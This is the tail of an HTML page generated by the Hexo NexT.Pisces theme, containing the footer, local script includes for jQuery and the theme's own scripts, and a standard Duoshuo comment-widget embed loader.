  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    
    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"venidic"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    
    <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  













  
  

  

  

  

  


  

</body>
</html>
